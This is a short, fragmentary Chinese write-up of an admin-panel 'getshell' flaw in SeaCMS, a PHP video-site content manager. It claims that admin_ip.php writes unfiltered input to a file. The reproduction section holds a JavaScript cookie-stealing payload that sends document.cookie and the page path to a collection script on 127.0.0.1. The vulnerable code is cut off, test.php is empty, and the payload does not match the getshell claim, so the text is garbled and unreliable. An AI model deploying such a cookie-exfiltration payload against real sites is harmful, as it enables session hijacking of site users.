# Seacms 后台getshell
===============
一、漏洞简介
————
海洋cms是一款简单的php内容管理系统,主要用于视频网站,采用PHP+MYSQL架构,未使用框架
二、漏洞影响
————
三、复现过程
————
后台代码如下
“;
fwrite($open,$str);
fclose($open);
ShowMsg(“成功保存设置!”,”admin_ip.php”);
exit;
}
?>
这里根本没有经过过滤,直接将变量写进去,可以写一个脚本利用
代码如下
# test.js
var img = new Image();
img.src= “http://127.0.0.1/test.php?x=” + document.cookie + “&p=” + location.pathname;
# test.php
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容